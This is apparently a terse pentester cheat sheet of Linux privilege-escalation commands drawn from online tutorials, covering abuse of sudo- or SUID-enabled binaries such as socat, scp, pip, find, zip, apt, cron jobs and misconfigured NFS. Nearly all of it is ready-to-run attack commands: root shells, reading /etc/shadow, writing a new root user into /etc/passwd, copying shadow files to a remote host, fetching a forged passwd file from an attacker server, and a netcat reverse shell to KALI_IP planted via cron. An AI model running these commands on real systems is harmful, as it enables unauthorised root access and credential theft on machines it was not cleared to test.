socat,scp,tmux,ed,sed,pip,git,cp,taskset,xxd,cat,Find,wget,zip,apt,cronjob,automation script,nfs
- 1)Linux For Pentester: socat Privilege Escalation
sudo rights sudo -l
test ALL=(root) NOPASSWD: /usr/bin/socat
method 1)
Victim: sudo socat TCP4-LISTEN:1234, reuseaddr EXEC:"/bin/sh"
Attacker: socat – TCP4:192.168.1.100:1234
Method 2)
Victim:sudo socat exec:'sh –li' ,pty,stderr,setsid,sigint,sane tcp:192.168.1.106:1234
Attacker: socat file: 'tty',raw,echo=0 tcp-listen:1234
Reference: https://www.hackingarticles.in/linux-for-pentester-socat-privilege-escalation/
-
2)Linux for Pentester: scp Privilege Escalation
sudo -l
test All=(root) NOPASSWD: /usr/bin/scp
method 1)
Victim:
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
method 2)
service ssh status (active)
Victim:
sudo scp /etc/passwd komal@192.168.1.11://
sudo scp /etc/shadow komal@192.168.1.11:
Attacker:
head /home/komal/shadow
head /home/komal/passwd -
3)Linux For Pentester: tmux Privilege Escalation
sudo -l
test All=(root) NOPASSWD: /usr/bin/tmux
victim:
sudo tmux
(a new terminal with root privilege shell.)
reference:https://www.hackingarticles.in/category/privilege-escalation/page/3/ -
4)Linux for Pentester: ed Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/
sudo -l
test All=(root) NOPASSWD: /bin/ed
victim: sudo ed -
5)Linux for Pentester: sed Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-sed-privilege-escalation/
sudo -l
test All=(root) NOPASSWD: /usr/bin/sed
Victim:
sudo sed -n '1e exec sh 1>&0' /etc/passwd -
6)Linux for Pentester: pip Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-pip-privilege-escalation/
sudo -l
test All=(root) NOPASSWD: /usr/bin/pip
Victim:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF -
7)git Priv esca
reference: https://www.hackingarticles.in/linux-for-pentester-git-privilege-escalation/
sudo -l
test All=(root) NOPASSWD: /usr/bin/git
Victim:
sudo git help config -
8)Linux for Pentester: cp Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/
SUID permision
find / -perm -u=s -type f 2>/dev/null
Attacker:
openssl passwd -1 -salt ignite pass123
(create passwd file in local machine and put ignite password as above)
python -m SimpleHTTPServerVictim:
cd /tmp
wget http://192.168.0.16:8000/passwd
cp passwd /etc/passwd
tail /etc/passwd
su ignite
password: pass123
id -
9)Linux for Pentester: Taskset Privilege Escalation
reference: https://www.hackingarticles.in/linux-for-pentester-taskset-privilege-escalation/
sudo -l
find / -perm -u=s -type f 2>/dev/null
openssl passwd -1 –salt mark pass123
Victim:
taskset 1 echo 'mark:$1$mark$PL9HIgTDwnE9sG27q2Nrb/:0:0:root/:root:/bin/bash' >>/etc/passwd
su mark
id -
10)Linux for Pentester: xxd Privilege Escalation
Reference:https://www.hackingarticles.in/linux-for-pentester-xxd-privilege-escalation/
SUID : find / -perm -u=s -type f 2>/dev/null
Vitim: xxd "/etc/shadow" | xxd -r
-
11)Linux for Pentester: CAT Privilege Escalation
Reference:https://www.hackingarticles.in/linux-for-pentester-cat-privilege-escalation/
Victim:
sudo -l
sudo cat /etc/shadow</br> -
12)Linux for Pentester: Find Privilege Escalation
Reference:https://www.hackingarticles.in/linux-for-pentester-find-privilege-escalation/
Suid: find /etc/ -readable -type f 2>/dev/null
sudo -l
test ALL=(root) NOPASSWD: /usr/bin/find
Victim:
sudo find /home -exec /bin/bash ;
find /home -exec /bin/bash ; -
13)Linux for Pentester: Wget Privilege Escalation
Reference: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/
Victime:
find / -perm -u=s -type f 2>/dev/null
Attacker: openssl passwd -1 -salt ignite pass123(Create passwd file in local machine)
Victim:
cd /etc
wget -O passwd http://192.168.1.108:8000/passwd
su ignite
password: pass123
id -
14)Linux for Pentester : ZIP Privilege Escalation
Reference:https://www.hackingarticles.in/category/privilege-escalation/page/6/
Sudo -l
sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"
-
15)Linux for Pentester: APT Privilege Escalation
Reference:https://www.hackingarticles.in/category/privilege-escalation/page/6/
sudo -l
test ALL=(ALL) NOPASSWD: /usr/bin/apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash
-
16)Exploiting Cron job
*/2 * *** root apt-get updateecho 'apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f”};’ > pwn
- 17)Linux Privilege Escalation via Automated Script
https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
Table of Content
Introduction
Vectors of Privilege Escalation
LinuEnum
Linuxprivchecker
Linux Exploit Suggester 2
Bashark
BeRoot
Vectors of Privilege EscalationOS Detail & Kernel Version
Any Vulnerable package installed or running
Files and Folders with Full Control or Modify Access
File with SUID Permissions
Mapped Drives (NFS)
Potentially Interesting Files
Environment Variable Path
Network Information (interfaces, arp, netstat) Running Processes Cronjobs User’s Sudo Right Wildcard InjectionLinux Privilege Escalation using Misconfigured NFS
REference: https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
Attacker:
nmap -sV --script=nfs-showmount 192.168.1.102
apt-get install nfs-common
showmount -e 192.168.1.102- Exploiting NFS server for Privilege Escalation
mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash
Victim:
mkdir /tmp/raj
mount -t nfs 192.168.1.102:/home /tmp/raj
cp /bin/bash .
chmod +s bash
ls -la bash
- 17)Linux Privilege Escalation via Automated Script
-
C Program
Attacker:
cp asroot.c /tmp/raj
cd /tmp/raj
gcc asroot.c -o shell
chmod +s shell
Victim:
cd /home
ls
./shell
id
whoami